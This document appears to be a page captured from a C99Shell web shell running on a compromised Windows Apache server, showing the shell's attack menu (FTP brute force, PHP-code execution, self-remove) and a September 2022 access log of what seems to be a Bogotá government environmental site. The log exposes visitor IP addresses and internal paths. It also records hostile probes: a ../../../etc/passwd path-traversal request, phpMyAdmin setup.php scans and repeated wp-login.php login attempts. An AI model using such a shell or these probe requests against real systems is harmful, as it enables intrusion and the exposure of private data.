!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.09.06.log (3.13 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [06/Sep/2022:00:01:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:02:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
54.218.88.0 - - [06/Sep/2022:00:03:35 -0500] "GET /calidad-del-aire-de-bogota-se-ha-visto-afectada-por-incendios-que-se-presentan-en-brasil.html HTTP/1.1" 200 904
172.22.2.4 - - [06/Sep/2022:00:02:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:03:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [06/Sep/2022:00:06:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:07:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:09:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
181.58.38.83 - - [06/Sep/2022:00:09:09 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.58.38.83 - - [06/Sep/2022:00:09:13 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2016%2F HTTP/1.1" 200 170796
181.58.38.83 - - [06/Sep/2022:00:09:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 244387
181.58.38.83 - - [06/Sep/2022:00:09:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3447.pdf HTTP/1.1" 200 672448
45.33.80.237 - - [06/Sep/2022:00:10:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [06/Sep/2022:00:10:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.80.237 - - [06/Sep/2022:00:10:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [06/Sep/2022:00:08:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:09:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51183
172.22.2.4 - - [06/Sep/2022:00:09:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51993
216.245.221.92 - - [06/Sep/2022:00:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:12:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
152.61.192.232 - - [06/Sep/2022:00:13:39 -0500] "GET / HTTP/1.1" 200 319
157.55.39.80 - - [06/Sep/2022:00:15:32 -0500] "GET /Publicaciones/2022EE190619.pdf HTTP/1.1" 404 228
185.119.81.102 - - [06/Sep/2022:00:15:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:00:15:35 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
181.58.38.83 - - [06/Sep/2022:00:15:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 283256
172.22.2.4 - - [06/Sep/2022:00:14:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Sep/2022:00:16:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:15:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
201.245.192.253 - - [06/Sep/2022:00:17:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
152.89.196.62 - - [06/Sep/2022:00:18:31 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
152.61.128.50 - - [06/Sep/2022:00:19:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Sep/2022:00:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41822
37.70.194.115 - - [06/Sep/2022:00:19:42 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.245.192.253 - - [06/Sep/2022:00:19:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42259
34.219.53.4 - - [06/Sep/2022:00:19:53 -0500] "GET /calidad-del-aire-de-bogota-se-ha-visto-afectada-por-incendios-que-se-presentan-en-brasil.html HTTP/1.1" 200 904
37.70.194.115 - - [06/Sep/2022:00:19:56 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
66.249.73.127 - - [06/Sep/2022:00:19:59 -0500] "-" 408 -
185.119.81.102 - - [06/Sep/2022:00:21:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:00:21:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:00:21:35 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
216.245.221.92 - - [06/Sep/2022:00:21:43 -0500] "HEAD / HTTP/1.1" 200 -
199.59.150.182 - - [06/Sep/2022:00:21:53 -0500] "GET /images/Mirla%20Comu%CC%81n%20SDA%20(1)%20(1).jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [06/Sep/2022:00:20:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:22:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:21:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [06/Sep/2022:00:26:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:27:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:26:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:27:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
201.245.192.253 - - [06/Sep/2022:00:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41822
201.245.192.253 - - [06/Sep/2022:00:29:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42259
162.220.165.123 - - [06/Sep/2022:00:30:36 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
157.55.39.8 - - [06/Sep/2022:00:31:02 -0500] "GET /BLA/resoluciones/AUTOS%202022/2238.pdf HTTP/1.1" 304 -
66.249.73.127 - - [06/Sep/2022:00:31:26 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:00:31:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:32:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:32:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:32:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
172.22.2.4 - - [06/Sep/2022:00:35:29 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 304 -
185.189.182.234 - - [06/Sep/2022:00:36:29 -0500] "GET / HTTP/1.1" 400 946
216.245.221.92 - - [06/Sep/2022:00:36:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:00:37:04 -0500] "-" 408 -
201.245.192.253 - - [06/Sep/2022:00:37:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:37:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41822
201.245.192.253 - - [06/Sep/2022:00:39:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42259
172.22.2.4 - - [06/Sep/2022:00:38:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [06/Sep/2022:00:41:43 -0500] "HEAD / HTTP/1.1" 200 -
173.255.228.219 - - [06/Sep/2022:00:41:53 -0500] "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 406 -
173.255.228.219 - - [06/Sep/2022:00:41:54 -0500] "GET / HTTP/1.1" 200 319
173.255.228.219 - - [06/Sep/2022:00:41:54 -0500] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1" 404 1049
201.245.192.253 - - [06/Sep/2022:00:42:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [06/Sep/2022:00:42:54 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:00:43:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:44:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [06/Sep/2022:00:46:43 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.8 - - [06/Sep/2022:00:47:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/4287.pdf HTTP/1.1" 200 397970
201.245.192.253 - - [06/Sep/2022:00:47:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.96 - - [06/Sep/2022:00:48:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [06/Sep/2022:00:48:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.73.127 - - [06/Sep/2022:00:48:34 -0500] "-" 408 -
40.77.167.52 - - [06/Sep/2022:00:48:54 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/conciencia-ambiental-28-agosto-300x162.jpg HTTP/1.1" 200 14559
172.22.2.4 - - [06/Sep/2022:00:49:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:51:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
216.245.221.92 - - [06/Sep/2022:00:51:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:50:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [06/Sep/2022:00:52:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:00:56:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:00:55:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:00:57:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:00:56:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50395
172.22.2.4 - - [06/Sep/2022:00:56:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
152.61.192.232 - - [06/Sep/2022:00:59:43 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [06/Sep/2022:00:59:44 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [06/Sep/2022:00:59:45 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
104.237.146.160 - - [06/Sep/2022:01:00:31 -0500] "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 406 -
104.237.146.160 - - [06/Sep/2022:01:00:31 -0500] "GET / HTTP/1.1" 200 319
104.237.146.160 - - [06/Sep/2022:01:00:32 -0500] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1" 404 1022
216.245.221.92 - - [06/Sep/2022:01:01:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:02:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:01:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:03:17 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2023%20del%2026%20de%20diciembre%20de%202018.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Sep/2022:01:02:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
185.119.81.107 - - [06/Sep/2022:01:03:59 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [06/Sep/2022:01:04:00 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.105 - - [06/Sep/2022:01:04:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:01:04:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [06/Sep/2022:01:06:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:07:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:07:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [06/Sep/2022:01:08:45 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 244221
172.22.2.4 - - [06/Sep/2022:01:07:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
172.22.2.4 - - [06/Sep/2022:01:10:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
66.249.73.100 - - [06/Sep/2022:01:10:58 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:01:11:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [06/Sep/2022:01:11:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=COMPETENCIA&fecha=2022&resuelve= HTTP/1.1" 200 39174
157.55.39.8 - - [06/Sep/2022:01:11:25 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Sep/2022:01:11:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 426857
216.245.221.92 - - [06/Sep/2022:01:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:12:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
35.204.10.117 - - [06/Sep/2022:01:13:55 -0500] "GET / HTTP/1.1" 200 319
35.204.10.117 - - [06/Sep/2022:01:13:55 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [06/Sep/2022:01:12:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [06/Sep/2022:01:14:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 283256
207.46.13.16 - - [06/Sep/2022:01:14:40 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
207.46.13.186 - - [06/Sep/2022:01:14:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 417697
128.1.131.197 - - [06/Sep/2022:01:15:18 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [06/Sep/2022:01:13:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
216.245.221.92 - - [06/Sep/2022:01:16:43 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.8 - - [06/Sep/2022:01:17:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3447.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Sep/2022:01:17:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
152.61.128.50 - - [06/Sep/2022:01:18:08 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [06/Sep/2022:01:18:09 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [06/Sep/2022:01:18:10 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
186.102.188.117 - - [06/Sep/2022:01:18:25 -0500] "-" 408 -
185.119.81.102 - - [06/Sep/2022:01:18:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:01:18:27 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Sep/2022:01:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41683
201.245.192.253 - - [06/Sep/2022:01:19:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42455
172.22.2.4 - - [06/Sep/2022:01:18:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:19:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
152.136.186.35 - - [06/Sep/2022:01:21:19 -0500] "GET http://190.27.245.106:80/pma/scripts/setup.php HTTP/1.0" 404 1018
152.136.186.35 - - [06/Sep/2022:01:21:19 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
152.136.186.35 - - [06/Sep/2022:01:21:19 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
152.136.186.35 - - [06/Sep/2022:01:21:19 -0500] "GET http://190.27.245.106:80/db/scripts/setup.php HTTP/1.0" 404 1018
216.245.221.92 - - [06/Sep/2022:01:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:22:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [06/Sep/2022:01:23:00 -0500] "-" 408 -
106.75.80.60 - - [06/Sep/2022:01:23:01 -0500] "GET / HTTP/1.0" 200 319
185.119.81.105 - - [06/Sep/2022:01:23:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:01:23:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
192.241.209.141 - - [06/Sep/2022:01:23:39 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Sep/2022:01:24:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [06/Sep/2022:01:25:49 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [06/Sep/2022:01:25:49 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [06/Sep/2022:01:24:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Sep/2022:01:26:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:25:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [06/Sep/2022:01:27:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:28:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [06/Sep/2022:01:29:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41683
201.245.192.253 - - [06/Sep/2022:01:29:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42455
216.245.221.92 - - [06/Sep/2022:01:31:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:32:03 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 304 -
201.245.192.253 - - [06/Sep/2022:01:32:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:30:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:31:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
172.22.2.4 - - [06/Sep/2022:01:34:49 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [06/Sep/2022:01:35:08 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [06/Sep/2022:01:35:08 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [06/Sep/2022:01:35:12 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [06/Sep/2022:01:35:13 -0500] "GET /BLA/boletinlegal/js/ajax_doctrina.js HTTP/1.1" 200 772
172.22.2.4 - - [06/Sep/2022:01:35:13 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
216.245.221.92 - - [06/Sep/2022:01:36:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:37:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:36:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:01:38:36 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:01:37:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
172.22.2.4 - - [06/Sep/2022:01:39:15 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C%20401%20de%202010.doc HTTP/1.1" 304 -
207.46.13.36 - - [06/Sep/2022:01:39:34 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2006/res+2006+1-50 HTTP/1.1" 200 11867
201.245.192.253 - - [06/Sep/2022:01:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41683
201.245.192.253 - - [06/Sep/2022:01:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42455
69.63.184.119 - - [06/Sep/2022:01:39:58 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
69.171.249.24 - - [06/Sep/2022:01:40:03 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
216.245.221.92 - - [06/Sep/2022:01:41:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:42:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:42:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:42:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
66.249.73.127 - - [06/Sep/2022:01:46:14 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:01:46:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:46:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:47:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:48:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [06/Sep/2022:01:51:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:51:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [06/Sep/2022:01:53:15 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:01:53:38 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 304 -
172.22.2.4 - - [06/Sep/2022:01:53:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:01:54:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
216.245.221.92 - - [06/Sep/2022:01:56:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:01:56:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:01:58:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.73.127 - - [06/Sep/2022:01:59:49 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:02:00:49 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Sep/2022:01:59:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Sep/2022:02:01:43 -0500] "HEAD / HTTP/1.1" 200 -
199.59.150.182 - - [06/Sep/2022:02:01:48 -0500] "-" 408 -
201.245.192.253 - - [06/Sep/2022:02:01:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:02:00:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
92.118.39.88 - - [06/Sep/2022:02:04:09 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [06/Sep/2022:02:06:16 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:02:06:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:06:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:02:05:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.40 - - [06/Sep/2022:02:07:48 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [06/Sep/2022:02:06:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
172.22.2.4 - - [06/Sep/2022:02:08:01 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%207%20del%2023%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 304 -
185.119.81.102 - - [06/Sep/2022:02:08:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:02:08:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [06/Sep/2022:02:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:11:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
101.43.83.130 - - [06/Sep/2022:02:12:22 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
172.22.2.4 - - [06/Sep/2022:02:11:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:02:13:18 -0500] "-" 408 -
101.43.83.130 - - [06/Sep/2022:02:13:25 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
172.22.2.4 - - [06/Sep/2022:02:12:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
172.22.2.4 - - [06/Sep/2022:02:15:13 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2026%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 644194
